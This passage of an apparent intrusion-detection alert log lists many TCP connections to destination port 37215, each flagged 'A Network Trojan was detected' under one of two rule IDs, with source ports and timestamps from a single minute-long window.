                  Source Port:56774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.710237
                  SID:2835222
                  Source Port:45468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.922024
                  SID:2835222
                  Source Port:35366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.438982
                  SID:2829579
                  Source Port:60570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.986652
                  SID:2829579
                  Source Port:49800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.561503
                  SID:2835222
                  Source Port:48860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.381447
                  SID:2829579
                  Source Port:45128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.883721
                  SID:2829579
                  Source Port:53274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.562174
                  SID:2829579
                  Source Port:35752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.768377
                  SID:2829579
                  Source Port:56702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600154
                  SID:2829579
                  Source Port:46852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.018335
                  SID:2829579
                  Source Port:60454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.723729
                  SID:2835222
                  Source Port:58956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.721021
                  SID:2835222
                  Source Port:48660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.518118
                  SID:2835222
                  Source Port:36998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.859176
                  SID:2835222
                  Source Port:54084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.174842
                  SID:2829579
                  Source Port:36414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.099101
                  SID:2829579
                  Source Port:52836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2829579
                  Source Port:35694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.427094
                  SID:2835222
                  Source Port:46330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.212749
                  SID:2835222
                  Source Port:56188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.272664
                  SID:2835222
                  Source Port:41028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.630807
                  SID:2829579
                  Source Port:50938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.542221
                  SID:2829579
                  Source Port:52122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.013030
                  SID:2835222
                  Source Port:49420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.519410
                  SID:2829579
                  Source Port:32928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.959053
                  SID:2835222
                  Source Port:33844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.483733
                  SID:2835222
                  Source Port:34688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.333954
                  SID:2829579
                  Source Port:59842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.859593
                  SID:2835222
                  Source Port:48400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.220659
                  SID:2829579
                  Source Port:43338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369689
                  SID:2829579
                  Source Port:49646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.610394
                  SID:2835222
                  Source Port:49334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.459997
                  SID:2835222
                  Source Port:36588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.493465
                  SID:2835222
                  Source Port:40676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.143490
                  SID:2829579
                  Source Port:50012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.158539
                  SID:2835222
                  Source Port:35698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.764270
                  SID:2835222
                  Source Port:45300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.412517
                  SID:2835222
                  Source Port:37120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.739348
                  SID:2829579
                  Source Port:45210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.395461
                  SID:2829579
                  Source Port:40792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.803264
                  SID:2835222
                  Source Port:48696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.514897
                  SID:2835222
                  Source Port:57442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.139663
                  SID:2835222
                  Source Port:58672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2829579
                  Source Port:33740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.478921
                  SID:2835222
                  Source Port:33866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.356650
                  SID:2835222
                  Source Port:50994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.398753
                  SID:2829579
                  Source Port:44932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.070374
                  SID:2835222
                  Source Port:43386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.433645
                  SID:2829579
                  Source Port:44686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.970396
                  SID:2835222
                  Source Port:49862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.857451
                  SID:2835222
                  Source Port:52240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069950
                  SID:2835222
                  Source Port:57818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081032
                  SID:2829579
                  Source Port:46470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.873718
                  SID:2829579
                  Source Port:41090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.594694
                  SID:2829579
                  Source Port:55668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.830052
                  SID:2835222
                  Source Port:50270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.028986
                  SID:2835222
                  Source Port:49714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2835222
                  Source Port:41348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.139593
                  SID:2829579
                  Source Port:41310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.139114
                  SID:2835222
                  Source Port:40640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.117875
                  SID:2835222
                  Source Port:45148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2829579
                  Source Port:37570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.624791
                  SID:2829579
                  Source Port:52670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.772861
                  SID:2829579
                  Source Port:34588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.728156
                  SID:2835222
                  Source Port:48944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.530292
                  SID:2835222
                  Source Port:57342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.161476
                  SID:2835222
                  Source Port:33102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.899276
                  SID:2835222
                  Source Port:52224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.159801
                  SID:2835222
                  Source Port:34486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.096498
                  SID:2829579
                  Source Port:50160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574763
                  SID:2835222
                  Source Port:52290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.948624
                  SID:2835222
                  Source Port:43418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623309
                  SID:2829579
                  Source Port:41150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.035646
                  SID:2829579
                  Source Port:33308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.973887
                  SID:2835222
                  Source Port:59816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.328472
                  SID:2829579
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.128414
                  SID:2835222
                  Source Port:45302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.856770
                  SID:2829579
                  Source Port:37122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.522078
                  SID:2835222
                  Source Port:33682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.671571
                  SID:2829579
                  Source Port:58924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.299032
                  SID:2829579
                  Source Port:46412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.513805
                  SID:2835222
                  Source Port:44672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.829275
                  SID:2835222
                  Source Port:50944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.164034
                  SID:2829579
                  Source Port:57896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.894187
                  SID:2829579
                  Source Port:57162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.962060
                  SID:2835222
                  Source Port:36838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2829579
                  Source Port:42690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.259600
                  SID:2829579
                  Source Port:45996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.526519
                  SID:2829579
                  Source Port:38296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.842047
                  SID:2835222
                  Source Port:37414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.584145
                  SID:2829579
                  Source Port:35790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.755062
                  SID:2829579
                  Source Port:42948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.779855
                  SID:2835222
                  Source Port:40704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.134623
                  SID:2835222
                  Source Port:52418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.647124
                  SID:2829579
                  Source Port:45448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.053322
                  SID:2829579
                  Source Port:40926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.692447
                  SID:2835222
                  Source Port:45170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.048975
                  SID:2829579
                  Source Port:56430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.216588
                  SID:2829579
                  Source Port:49952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.822486
                  SID:2835222
                  Source Port:58420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.913856
                  SID:2829579
                  Source Port:37838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.851082
                  SID:2829579
                  Source Port:46948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.268885
                  SID:2829579
                  Source Port:46682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.176573
                  SID:2829579
                  Source Port:33700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.294744
                  SID:2835222
                  Source Port:42286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.551602
                  SID:2829579
                  Source Port:48302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.116330
                  SID:2829579
                  Source Port:55914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.432411
                  SID:2829579
                  Source Port:44730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.837323
                  SID:2829579
                  Source Port:49864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.120282
                  SID:2835222
                  Source Port:48604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.610396
                  SID:2829579
                  Source Port:39068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.286417
                  SID:2835222
                  Source Port:56712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.394343
                  SID:2829579
                  Source Port:45672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.421781
                  SID:2835222
                  Source Port:48606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.530993
                  SID:2835222
                  Source Port:36854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.538749
                  SID:2829579
                  Source Port:37450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.259774
                  SID:2835222
                  Source Port:35650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.189669
                  SID:2829579
                  Source Port:56644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.007894
                  SID:2829579
                  Source Port:46300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328936
                  SID:2829579
                  Source Port:41768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657885
                  SID:2835222
                  Source Port:58780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.545525
                  SID:2835222
                  Source Port:34840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.289201
                  SID:2835222
                  Source Port:57960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.664529
                  SID:2829579
                  Source Port:38954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.090184
                  SID:2835222
                  Source Port:47630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.147329
                  SID:2829579
                  Source Port:35754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.149961
                  SID:2829579
                  Source Port:47512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.613127
                  SID:2835222
                  Source Port:44104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.860758
                  SID:2829579
                  Source Port:51156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.398753
                  SID:2835222
                  Source Port:35960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.400460
                  SID:2829579
                  Source Port:33314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853963
                  SID:2829579
                  Source Port:54698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617808
                  SID:2829579
                  Source Port:41766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.655594
                  SID:2829579
                  Source Port:52404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.494991
                  SID:2829579
                  Source Port:48392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389862
                  SID:2829579
                  Source Port:40636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.351046
                  SID:2829579
                  Source Port:58946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.832820
                  SID:2829579
                  Source Port:44488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.216208
                  SID:2835222
                  Source Port:34260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603545
                  SID:2835222
                  Source Port:58416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127270
                  SID:2835222
                  Source Port:45802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.975422
                  SID:2829579
                  Source Port:56326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.961786
                  SID:2829579
                  Source Port:33884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281648
                  SID:2829579
                  Source Port:36284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.208952
                  SID:2835222
                  Source Port:41320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.850187
                  SID:2835222
                  Source Port:36770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.843414
                  SID:2829579
                  Source Port:60556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.444782
                  SID:2829579
                  Source Port:41358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.262926
                  SID:2835222
                  Source Port:39442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.974934
                  SID:2829579
                  Source Port:55192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.161951
                  SID:2829579
                  Source Port:57326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.561697
                  SID:2835222
                  Source Port:49596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.776935
                  SID:2835222
                  Source Port:47478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.595538
                  SID:2835222
                  Source Port:33394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.597070
                  SID:2829579
                  Source Port:50214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.149592
                  SID:2829579
                  Source Port:38714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.993548
                  SID:2829579
                  Source Port:34720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.002516
                  SID:2835222
                  Source Port:35124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.614233
                  SID:2835222
                  Source Port:34734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.870602
                  SID:2829579
                  Source Port:39944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.875784
                  SID:2829579
                  Source Port:53110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.847593
                  SID:2829579
                  Source Port:42928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.845184
                  SID:2835222
                  Source Port:47732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.957475
                  SID:2835222
                  Source Port:40938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.994829
                  SID:2829579
                  Source Port:45178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.836737
                  SID:2835222
                  Source Port:51490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.847925
                  SID:2835222
                  Source Port:44284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.773656
                  SID:2835222
                  Source Port:53618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.979211
                  SID:2829579
                  Source Port:42332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.838932
                  SID:2829579
                  Source Port:36482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.932047
                  SID:2829579
                  Source Port:41632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.888135
                  SID:2829579
                  Source Port:33006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.330413
                  SID:2829579
                  Source Port:60640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.003273
                  SID:2835222
                  Source Port:46204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.222515
                  SID:2835222
                  Source Port:46778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758011
                  SID:2835222
                  Source Port:53178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.524057
                  SID:2835222
                  Source Port:38746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.923054
                  SID:2835222
                  Source Port:43754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385605
                  SID:2835222
                  Source Port:52250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.708629
                  SID:2835222
                  Source Port:35116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.017003
                  SID:2835222
                  Source Port:54006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.650487
                  SID:2835222
                  Source Port:59344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.896457
